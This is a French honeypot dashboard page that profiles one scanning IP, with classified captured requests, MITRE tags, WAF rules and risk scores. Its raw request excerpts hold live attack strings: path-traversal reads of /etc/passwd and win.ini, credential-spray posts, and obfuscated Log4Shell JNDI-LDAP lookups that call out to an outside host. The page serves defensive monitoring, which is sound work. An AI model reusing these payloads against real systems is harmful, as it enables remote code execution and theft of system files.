Profil de menace
Activité suspecte — risque 51/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Période analysée : 2026-07-30 → 2026-07-31
Activité suspecte — risque 51/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Campagne de scan — plusieurs IP du même /24 (34.19.127.0/24, ≥3 pairs)
Activité suspecte — risque 51/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance 64 % — Score WAF 72 · Bonus corrélation +10 · 3 tag(s) WAF
ASN 396982 · 34.19.0.0/17 · ARIN — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 85 événements sur la période pour cette IP.
Même FAI Google LLC — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
85 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
85 événement(s) — page 1/2
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 9207 · HTTP | http | SSRF interne ssrf internal · via HTTP:9207 · (tentative d'exploit) | Élevée | Moyen · 51 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9207
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 51
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9207 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9207 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 9207 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:9207 · (tentative d'exploit) · → /Windows/win.ini | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9207
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0715
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:9207 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) A
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:9207 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 9207 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:9207 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9207
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
pat-0802
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
MITRE T1083 file enum
SSRF Any-address SSRF
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:9207 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleW
Requête brute (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:9207 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8888 · HTTP | http | SSRF interne ssrf internal · via HTTP:8888 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8888
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
HTTP alt 8888 probe
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8444 · HTTP | http | SSRF interne ssrf internal · via HTTP:8444 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8444
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8444 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8444 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8200 · HTTP | http | SSRF interne ssrf internal · via HTTP:8200 · (tentative d'exploit) | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8200
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 54
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) | Élevée | Moyen · 53 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8098
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 53
Confiance : Confiance 100 % — 3 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8098 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8087 · HTTP | http | deser php attack deser php attack · via HTTP:8087 · (tentative d'exploit) · → /${${2:l7m:-j}${j8em:o4:i6k:-n}${iw:4xfj:0avg:-… | Élevée | Élevé · 71 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
PUT /${${2:l7m:-j}${j8em:o4:i6k:-n}${iw:4xfj:0avg:-d}${d:-i}${sm:p8uw:x5g0:-:}${jas4:zj:-l}${7b39:3:-d}… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${2:l7m:-j}${j8em:o4:i6k:-n}${iw:4xfj:0avg:-d}${d:-i}${sm:p8uw:x5g0:-:}${jas4:zj:-l}${7b39:3:-d}${pa6b:1:-a}${7u:u:-p}${x3:o17:jz:-:}${t3o:fja:-/}${5zsw:-/}${h90r:qjd:-P}${j:2:-A}${wrz:-l}${e36:o:qa:-0}${ah:25:x:-c}${rgml:--}${${r:b:0:-s}${c:56:5bd:-y}${8r5s:rjol:-s}${w1:-:}${l:s9:8kun:-j}${xjf0:v:-a}${g3:suv:-v}${qzde:5wz0:po:-a}${in:l2:b7:-.}${4f5:8q24:k:-v}${s:s8g:92pk:-e}${3tz:etzb:xolj:-r}${y4v:yqnd:e0:-s}${jn:w:-i}${qot:-o}${d0n:s:m39:-n}}${b:xlbm:o7z:-.}${o6:2p:b:-4}${fba1:g6wp:-e}${y:-b}${5:n:q1:
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
8087
Chemin / cible
/${${2:l7m:-j}${j8em:o4:i6k:-n}${iw:4xfj:0avg:-d}${d:-i}${sm:p8uw:x5g0:-:}${jas4:zj:-l}${7b39:3:-d}${pa6b:1:-a}${7u:u:-p}${x3:o17:jz:-:}${t3o:fja:-/}${5zsw:-/}…
Service
HTTP
Pourquoi cette classification : Type « deser_php_attack » (signaux protocolaires) · confiance 95%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 95 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0817
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET PHP serialize O:
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${2:l7m:-j}${j8em:o4:i6k:-n}${iw:4xfj:0avg:-d}${d:-i}${sm:p8uw:x5g0:-:}${jas4:zj:-l}${7b39:3:-d}${pa6b:1:-a}${7u:u:-p}${x
Requête brute (extrait)
PUT /${${2:l7m:-j}${j8em:o4:i6k:-n}${iw:4xfj:0avg:-d}${d:-i}${sm:p8uw:x5g0:-:}${jas4:zj:-l}${7b39:3:-d}${pa6b:1:-a}${7u:u:-p}${x3:o17:jz:-:}${t3o:fja:-/}${5zsw:-/}${h90r:qjd:-P}${j:2:-A}${wrz:-l}${e36:o:qa:-0}${ah:25:x:-c}${rgml:--}${${r:b:0:-s}${c:56:5bd:
|
|||||||
| TCP | 8087 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:8087 · (sonde / probe) · → /login | Élevée | Élevé · 71 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
33
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8087
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
rce-14
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2828 Content-Type: application/x-www-form-urlencod |
|||||||
| TCP | 8087 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:8087 · (sonde / probe) · → /login | Élevée | Élevé · 71 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8087
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:8087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Content-Length: 1599 {"username"
|
|||||||
| TCP | 8087 · HTTP ALT 8087 | http-alt-8087 | Injection PHP php injection · via HTTP ALT 8087:8087 · (tentative d'exploit) | Faible | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
HTTP-ALT-8087
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8087
Chemin / cible
—
Service
HTTP ALT 8087
Payload
ZSDLKFJ2 /${${xy3:-j}${nq64:-n}${zi:q4s:yrd:-d}${jk:su:4:-i}${td:b:-:}${7:0sb:-l}${oj:b:-d}${t3a:gvr7:j:-a}${lc:gris:9:-p}${v:vw
Pourquoi cette classification : Type « php_injection » (signaux protocolaires) · confiance 97%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 97 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${xy3:-j}${nq64:-n}${zi:q4s:yrd:-d}${jk:su:4:-i}${td:b:-:}${7:0sb:-l}${oj:b:-d}${t3a:gvr7:j:-a}${lc:gris:9:-p}${v:vw
Requête brute (extrait)
ZSDLKFJ2 /${${xy3:-j}${nq64:-n}${zi:q4s:yrd:-d}${jk:su:4:-i}${td:b:-:}${7:0sb:-l}${oj:b:-d}${t3a:gvr7:j:-a}${lc:gris:9:-p}${v:vws:-:}${am:-/}${fe2n:zj:ls:-/}${nbs:ehxq:-P}${ve:r7:-A}${cm:-l}${yg2:ota4:-0}${gr6:rq:v3h:-c}${3o:c:27v:--}${${rizm:-s}${4v26:-y}
|
|||||||
| TCP | 8087 · HTTP | http | Sonde port 8087/TCP port 8087 tcp · via HTTP:8087 · (sonde / probe) · → /${${or:-j}${w5:-n}${zxk:6kgw:0hn:-d}${7s:3s0:j… | Élevée | Moyen · 62 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${or:-j}${w5:-n}${zxk:6kgw:0hn:-d}${7s:3s0:jsh9:-i}${2mt:-:}${z:-l}${4:-d}${d0zs:w:-a}${0b:-p}${… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${or:-j}${w5:-n}${zxk:6kgw:0hn:-d}${7s:3s0:jsh9:-i}${2mt:-:}${z:-l}${4:-d}${d0zs:w:-a}${0b:-p}${i0:1x49:-:}${n3di:-/}${wds:4xfk:-/}${x:4wpq:-P}${npxw:rf0:q2u:-A}${x61:-l}${rgc:-0}${u6:ta:-c}${jr:hv:k5:--}${${y8m:fi9:-s}${rvdk:g2:-y}${13c:pjvk:-s}${k1g:qa:-:}${pitm:k:-j}${9xv:-a}${x:y:-v}${s:mf:k:-a}${f2:-.}${ko7:m:-v}${0nmx:qk:-e}${75li:u36:p:-r}${0w5:o:cp:-s}${ecr:9d16:6rp:-i}${4egz:s4k:-o}${i:0na8:e:-n}}${wz0a:-.}${4pd:uq:5djb:-4}${s:-e}${tn:1n:8d92:-b}${n:-e}${mvbl:njxy:6nc:-7}${y4:3:rg:-b}${j8:-a}${r
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8087
Chemin / cible
/${${or:-j}${w5:-n}${zxk:6kgw:0hn:-d}${7s:3s0:jsh9:-i}${2mt:-:}${z:-l}${4:-d}${d0zs:w:-a}${0b:-p}${i0:1x49:-:}${n3di:-/}${wds:4xfk:-/}${x:4wpq:-P}${npxw:rf0:q2…
Preuve honeypot — Sonde port 8087/TCP
Connexion détectée sur le port 8087 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8087_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 62
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${or:-j}${w5:-n}${zxk:6kgw:0hn:-d}${7s:3s0:jsh9:-i}${2mt:-:}${z:-l}${4:-d}${d0zs:w:-a}${0b:-p}${i0:1x49:-:}${n3di:-/}${wd
Requête brute (extrait)
GET /${${or:-j}${w5:-n}${zxk:6kgw:0hn:-d}${7s:3s0:jsh9:-i}${2mt:-:}${z:-l}${4:-d}${d0zs:w:-a}${0b:-p}${i0:1x49:-:}${n3di:-/}${wds:4xfk:-/}${x:4wpq:-P}${npxw:rf0:q2u:-A}${x61:-l}${rgc:-0}${u6:ta:-c}${jr:hv:k5:--}${${y8m:fi9:-s}${rvdk:g2:-y}${13c:pjvk:-s}${k
|
|||||||
| TCP | 8087 · HTTP | http | Sonde port 8087/TCP port 8087 tcp · via HTTP:8087 · (sonde / probe) · → /${${e:2:tr:-j}${2tx:n:-n}${c8:8b:-d}${s7g8:oae… | Élevée | Moyen · 61 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${e:2:tr:-j}${2tx:n:-n}${c8:8b:-d}${s7g8:oae:-i}${0:o:-:}${oip:a:uya:-l}${vyl8:1r:-d}${7:-a}${p:… UA ${${hu:-j}${md:-n}${b:5f:-d}${cy:-i}${z8:-:}${g:604o:-l}${ba3x:…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${e:2:tr:-j}${2tx:n:-n}${c8:8b:-d}${s7g8:oae:-i}${0:o:-:}${oip:a:uya:-l}${vyl8:1r:-d}${7:-a}${p:-p}${pch:-:}${cmr:mtp:-/}${qky:buc6:-/}${hj6:-P}${2:-A}${cgub:-l}${rc:-0}${hwq:if:-c}${ads:--}${${uegd:-s}${x:vm8:-y}${d3:-s}${g:kolm:-:}${gj:-j}${g:85:dyo:-a}${q:w:e:-v}${u:2wx:-a}${xdmc:7f:-.}${y4:k:-v}${5g:tv1:-e}${x:-r}${87ei:0:o40r:-s}${gmb:jn:-i}${tvn:4yq:vdlg:-o}${uyoa:l:-n}}${a:-.}${doq5:dv3:-4}${pwt7:gn:-e}${sl:8t:jw:-b}${ox0:mh:r:-e}${8htm:-7}${6:-b}${po:hku8:-a}${xb:rl:o31:-d}${tsbv:pbk3:-2}${gacl:m
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8087
Chemin / cible
/${${e:2:tr:-j}${2tx:n:-n}${c8:8b:-d}${s7g8:oae:-i}${0:o:-:}${oip:a:uya:-l}${vyl8:1r:-d}${7:-a}${p:-p}${pch:-:}${cmr:mtp:-/}${qky:buc6:-/}${hj6:-P}${2:-A}${cgu…
Preuve honeypot — Sonde port 8087/TCP
Connexion détectée sur le port 8087 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8087_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 61
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${hu:-j}${md:-n}${b:5f:-d}${cy:-i}${z8:-:}${g:604o:-l}${ba3x:-d}${6wcy:x8pt:-a}${um:7dck:-p}${iwej:-:}${uf8l:gx0:-/}${3f:d:uy:-/}${k9:fo:b:-U}${b:-A}${oe76:0v:-l}${073q:0xm5:-0}${c90g:-c}${rw:52:hd…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${e:2:tr:-j}${2tx:n:-n}${c8:8b:-d}${s7g8:oae:-i}${0:o:-:}${oip:a:uya:-l}${vyl8:1r:-d}${7:-a}${p:-p}${pch:-:}${cmr:mtp:-/}
Requête brute (extrait)
